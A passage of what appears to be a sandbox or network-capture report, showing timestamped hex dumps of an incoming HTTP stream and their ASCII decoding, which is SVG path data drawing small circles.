                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2245INData Raw: 31 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 33 30 2e 37 38 2c 31 37 35 2e 32 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 38 2c 32 2e 37 38 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                          Data Ascii: 1.05,2.66,2.66,0,0,1,.57-3.21,2.5,2.5,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M730.78,175.26a1.91,1.91,0,0,1-.87,2.48,2.78,2.78,0,0,1-3.71-1.05,2.68,2.68,0,0,1,.56-3.21,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"/><path class="
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2261INData Raw: 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 37 35 2c 32 35 31 2e 33 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 37 36 34 2e 34 39 2c 32 34 33 2e 36 34 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39
                                                                                                                                                                                                                                                                          Data Ascii: 22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.75,251.36a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.68,2.68,0,0,1,.57-3.22,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"/><path class="cls-7" d="M764.49,243.64a1.92,1.92,0,0,1-.87,2.49
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2277INData Raw: 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 35 33 2e 34 32 2c 32 35 39 2e 35 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                          Data Ascii: .13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M653.42,259.54a2.16,2.16,0,0,1-1.1,2.75,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2293INData Raw: 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 36 38 38 2e 31 35 2c 33 32 30 2e 36 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20
                                                                                                                                                                                                                                                                          Data Ascii: -4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M688.15,320.61a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2309INData Raw: 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 32 2e 38 39 2c 33 38 31 2e 36 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 32 33 2c 33 37 33 61 32 2e 31 36
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M722.89,381.68a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.81,2.81,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M723,373a2.16
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2325INData Raw: 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 36 32 2c 34 34 32 2e 37 36 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 35 37 2e 37 2c 34 33 34 2e 30 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c
                                                                                                                                                                                                                                                                          Data Ascii: ,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M757.62,442.76a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M757.7,434.08a2.15,2.15,0,0,1-1.09,2.75,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2341INData Raw: 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 2c 32 36 30 2e 37 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 37 38 35 2e 37 38 2c 32 35 32 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: 2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M785.7,260.71a2.15,2.15,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M785.78,252a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2357INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 34 34 2c 33 32 31 2e 37 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 35 31 2c 33 31 33 2e 31 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37
                                                                                                                                                                                                                                                                          Data Ascii: ath class="cls-9" d="M820.44,321.78a2.16,2.16,0,0,1-1.1,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M820.51,313.1a2.15,2.15,0,0,1-1.09,2.76,3.15,3.15,0,0,1-4.12-1.36,3,3,0,0,1,.7
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2373INData Raw: 22 4d 38 35 35 2e 31 37 2c 33 38 32 2e 38 36 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 35 2e 32 35 2c 33 37 34 2e 31 38 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c
                                                                                                                                                                                                                                                                          Data Ascii: "M855.17,382.86a2.15,2.15,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M855.25,374.18a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2389INData Raw: 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 32 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 39 30 2c 34 33 35 2e 32 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 37 22 2f 3e 3c 70 61 74
                                                                                                                                                                                                                                                                          Data Ascii: .1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.2,2.64,2.64,0,0,1,0,3.57"/><path class="cls-9" d="M890,435.25a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.63,2.63,0,0,1,0,3.57"/><pat
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2405INData Raw: 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 38 2e 30 36 2c 32 35 33 2e 32 31 41 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2c 39 31 37 2c 32 35 36 61 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33
                                                                                                                                                                                                                                                                          Data Ascii: 0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"/><path class="cls-9" d="M918.06,253.21A2.15,2.15,0,0,1,917,256a3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2421INData Raw: 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 35 32 2e 38 2c 33 31 34 2e 32 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 33 2e 36 31 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39
                                                                                                                                                                                                                                                                          Data Ascii: ,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9" d="M952.8,314.28a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.8-3.58,2.8,2.8,0,0,1,3.61.19,2.66,2.66,0,0,1,0,3.58"/><path class="cls-9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2437INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 35 38 2c 32 35 31 2e 36 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 2e 32 38 2c 32 34 32 2e 38 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M59.58,251.63a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M59.28,242.85a2.18,2.18,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2453INData Raw: 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 39 37 2c 33 30 33 2e 30 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d
                                                                                                                                                                                                                                                                          Data Ascii: 8,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M97,303.09a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2469INData Raw: 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 35 36 2c 31 31 37 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 31 37 2e 32 36 2c 31 30 39 2e 30 35 61 32 2e 31 38 2c 32 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 6,2.86,2.86,0,0,1,3.67,0,2.67,2.67,0,0,1,.19,3.61"/><path class="cls-7" d="M117.56,117.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M117.26,109.05a2.18,2.18,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2485INData Raw: 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2e 33 31 2c 31 37 38 2e 30 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 37 2c 32 2e 36 37 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 35 35 2c 31
                                                                                                                                                                                                                                                                          Data Ascii: 1.2,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M155.31,178.08a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.84,2.84,0,0,1,3.66,0,2.67,2.67,0,0,1,.2,3.62"/><path class="cls-7" d="M155,1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:33 UTC2501INData Raw: 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 33 2e 30 37 2c 32 33 38 2e 33 32 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 39 32 2e 37 37 2c 32 32 39 2e 35 34 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c
                                                                                                                                                                                                                                                                          Data Ascii: 0,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M193.07,238.32a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M192.77,229.54a2.17,2.17,0,0,1-1,2.83,3.18,
